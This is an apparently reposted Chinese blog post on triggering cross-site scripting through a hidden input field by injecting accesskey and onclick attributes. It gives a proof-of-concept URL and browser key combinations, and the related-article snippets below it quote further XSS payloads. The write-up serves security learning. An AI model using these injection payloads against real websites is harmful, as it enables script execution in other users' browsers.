Hidden属性的input标签中XSS的触发方法

最新推荐文章于 2024-06-20 11:54:07 发布
最新推荐文章于 2024-06-20 11:54:07 发布
阅读量8.8k 收藏 5
点赞数
分类专栏: xss

今天看到一个XSS漏洞,插入点在一个有hidden 属性的input 标签,大致情况如下:

<input type="hidden" name="returnurl" value="[USER INJECT]" />
 
 
  • 1

 
 
  • 1

正常情况下的XSS应当是:

http://victim/?value=” οnclick=”alert(document.domain)

但是这里由于该input 未在页面中显示,常用的onclick 方法无法使用(点不到这个标签怎么触发onclick…),不过在浏览器中还有一个好玩的属性叫accesskey 于是乎构造:

<input type="hidden" name="returnurl" value="" accesskey="X" onclick="alert(document.domain)" />
 
 
  • 1

 
 
  • 1

PoC为:

http://victim/?returnurl=” accesskey=”X” οnclick=”alert(document.domain)

触发方法不同的浏览器不同,下面是w3school的总结: 
accesskey 
所以上面的XSS触发方法为: 
FF下:shift+alt+X (测试成功) 
Chrome:alt+X (最新版Chrome未测试成功) 

IE下:alt+X (未测试成功)

原文链接:http://blog.csdn.net/change518/article/details/51024706

AdministratorHack
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
怎么使用input执行xss攻击_XSS场景及修复方案总结
weixin_32562973的博客
01-16 4637
xss原理跨站脚本攻击(Cross Site Scripting),缩写为XSS。恶意攻击者往Web页面里插入恶意javaScript代码,当用户浏览该页之时,嵌入其Web里面的javaScript代码会被执行,从而达到恶意攻击用户的目的。xss分类反射型存储型DOM型xss场景和防御1. 恶意数据出现在标签内<body> ...恶意数据 </body>漏洞代码Strin...
web登录页面代码_XSS实战之登录钓鱼网站后台
weixin_39974882的博客
12-10 2537
前言感觉最近被盗号的很多,好朋友账号被盗,我竟然傻乎乎的转了200大洋。本篇就以钓鱼为主题,只是让大家提升一下对盗号的认识和理解,让大家对于钓鱼盗号有所防范。XSS漏洞之前写过一篇文章讲解XSS漏洞分类以及危害,XSS是跨站脚本攻击,属于被动式的攻击。XSS指的是恶意攻击者往Web页面里插入恶意代码,当用户浏览该页之时,嵌入其Web里面的恶意代码会被执行,从而达到特殊目的。最常见的就是...
不可见(hiddeninput标签触发XSS
weixin_33963594的博客
12-29 1173
在寻找XSS的过程,会发现从POST或者URL参数拿到INPUT存放,但这些input都是hidden不可见的,通过F12调试,查看构造出来的代码确实存在点击事件,但是总是触发不了 通过网上查询资料,最总找到使用一个比较高级一点属性accesskey=""来触发不可见标签事件,accesskey是HTML语言标签的一个全局属性 <input type="hidden" name="...
Web渗透:XSS-反射型&存储型
最新发布
WolvenSec的博客
06-20 1006
跨站脚本攻击(Cross-Site Scripting,XSS)是一种常见的网络安全漏洞,它允许攻击者将恶意脚本注入到网页,其他用户在浏览这些页面时,可能会执行这些恶意脚本,从而导致各种安全问题,如窃取用户信息、会话劫持等。
【应用安全——XSSinput-hidden
Fly_鹏程万里
02-22 798
1、使用expression突破 &lt;input type=hidden style="x:expression(alert(/xss/))"&gt; 直接利用CSS的expression属性来实现突破,此技巧适用于IE6及以下的浏览器。 2​、使用accesskey突破 &lt;input type="hidden" accesskey="X" onclick="alert(/x...
隐藏参数XSS
qq_43776408的博客
07-29 616
HTML表单隐藏 burp抓包测试 抓包发现 即便是hidden属性的值 在抓到包之后也能看到值 值为hackme 第四关 第四关的题和第三关表面看一样 HTML的svg介绍 闭合触发XSS 第一个双引号是为了闭合前面的引号 %0a个人感觉是换行的 感觉和下面的和svg没关系啊 你直接找hidden 找打了hidden就用这一篇讲的方法 你可以现在burp对p1和p2参数进行测试 直接写入代码 发现不行 第三关对p1参测试不可以 但是第三关对p2参数测试可以 现在是对p1和p2测试都不可以 都把
第四节 隐藏提交参数XSS-01
09-15
闭合触发XSS可以使攻击者在用户的浏览器执行恶意脚本,导致安全问题。 总结 ---- 本节课程主要讲解了隐藏提交参数XSS攻击,包括HTML表单隐藏参数、Burpsutie抓包测试、HTMLSVG介绍和闭合触发XSS等知识点。...
Input hidden Monitor-crx插件
04-01
Input hidden Monitor-crx插件】是一款专为监控和检测网页隐藏输入元素变化而设计的浏览器扩展程序。这款插件主要适用于JavaScript环境,能够帮助开发者、测试人员以及网络安全专家实时跟踪那些通过JavaScript...
javascript函数执行c#函数的方法
09-04
- **方法一**:使用隐藏的HTML输入控件(`<input type="hidden" runat="server">`),在C#设置其值,JavaScript可以通过DOM操作获取。 - **方法二**:直接在JavaScript引用带有`runat="server"`的控件ID,如`...
form+iframe解决跨域上传文件的方法
11-28
`target`属性设为`hidden_frame`,这意味着表单提交后,响应将加载到名为`hidden_frame`的`iframe`。`iframe`被设置为`display:none`,因此用户看不到它的存在,但仍然能处理后台的响应。 `<form>`内部包含了多个...
Input XSS最新漏洞及利用
06-12
我们知道,如果要使XSS能够实现,我们的代码必须通过某种方式嵌入到对方的网页。像注入漏洞的“’”、“and 1=1”和“and 1=2”一样,Input XSS也有自己的漏洞检测字符串,它们就是“<>”、“<iframe>”和 “<script>alert(/xss/)</script>”。如果当你在Input输入“<>”,并在新 页面的源代码找到这对标签的话,那么基本上就说明它存在Input XSS漏洞;而“<iframe>”则是它的可视化检测方式;如果“<script>alert(/xss/)< /script>”能够实现,则证明该页面可以实行脚本攻击,但是否可以被插入脚本,在本次的测试里亦不是非常重要,后面你将会知道。
javascript函数执行C#代码的函数.docx
12-05
<input type="hidden" name="FunName" /> <!-- 用来存储你要调用的函数 --> ``` 3. **C#处理逻辑:** ```csharp protected void Page_Load(object sender, EventArgs e) { if (!Page.IsPostBack) { string ...
xss注入
qq_63267612的博客
07-03 1472
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其Web里面的Script代码会被执行,从而达到恶意攻击用户目的。 XSS危害:XSS分类测试管理界面是否存在XSS: 在用户名框输入">(闭合input标签) 结果,界面弹窗,证明该系统存在XSS注入 上一步验证得出,该页面存在XSS漏洞。接下来针对该漏洞
怎么使用input执行xss攻击_萌新向 | 输入框因何频受攻击?
weixin_32401075的博客
01-08 2979
萌新向XSS漏洞导言:我们决定特别建立一个专辑,以帮助没有基础的人快速入门。该专辑与同样分为Web与二进制两项,但与公众号的专辑区别在于,我们将着重引导新生入门,讲述最简单、最基础的知识,事无巨细地讲述相关知识点与操作,即使你对计算机一无所知,我们也相信,你能跟随着我们的文章,满足你之前对于安全的一些想象。如果你对安全一无所知却又非常感兴趣,那么,我们的文章将会是你入门的最佳选择。我们的...
普通的XSS脚本写法
Coisini的博客
05-22 1095
1)普通的XSS JavaScript注入 (2)IMG标签XSS使用JavaScript命令 (3)IMG标签无分号无引号 (4)IMG标签大小写不敏感 (5)HTML编码(必须有分号) (6)修正缺陷IMG标签 <IMG “”">”> (7)formCharCode标签(计算器) (8)UTF-8的Unicode编码(计算器) <IMG SRC=jav…省略...
如何获取提交后的input标签的值_利用XSS获取用户明文账户密码
weixin_39821330的博客
12-03 364
我们知道在浏览器存在这样一个功能,当用户登录成功了一个网页后,浏览器会提示我们是否保存密码。如果我们点击同意,那么浏览器就会将账户及密码进行保存。当我们退出账户再次访问登录页面的时候,我们会发现浏览器已经将我们保存好了的账户及密码填写到了对应的输入框内。如图。那么浏览器是如何识别到这个网页并自动填充好密码的呢,首先,浏览器需要知道我们访问的这个域名是否有保存过账户及密码。然后他会去查询网...
跨站脚本漏洞
weixin_46729085的博客
09-08 3765
XSS漏洞 一、文章简介 XSS漏洞是Web应用程序最常见的漏洞之一。如果您的站点没有预防XSS漏洞的固定方法,那么很可能就存在XSS漏洞。 这篇文章将带你通过代码层面去理解三个问题: 什么是XSS漏洞? XSS漏洞有哪些分类? 如何防范XSS漏洞? 二:三大分类 反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器没有这样的页面和内容),一般容易出现在搜索页面。 存储型XSS:&...
input禁止输入html转义字符串,xss 防止攻击,恶意用户将输入的信息当成html或js代码执行,办法是将用户输入的信息改为text格式,或特殊符号转义...
weixin_39655689的博客
06-07 1087
xss 防止攻击,恶意用户将输入的信息当成html或js代码执行,办法是将用户输入的信息改为text格式,或特殊符号转义XSS攻击的防范XSS攻击造成的危害之所以会发生,是因为用户的输入变成了可执行的代码,因此我们要对用户的输入进行HTML转义处理,将其的尖括号,引号,单引号等特殊字符进行转义编码,例如“〈”转义后为“&lt;”,“>”转义后为“&gt;”,“‘”转义后为“...
IECSS触发XSS攻击:技巧与绕过
在本节,我们将深入探讨在IE浏览器利用CSS进行跨站脚本攻击(XSS,Cross-Site Scripting)的第十四节内容。首先,让我们回顾一下CSS(层叠样式表)的基本概念。CSS是一种用于描述网页外观和布局的语言,它允许...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值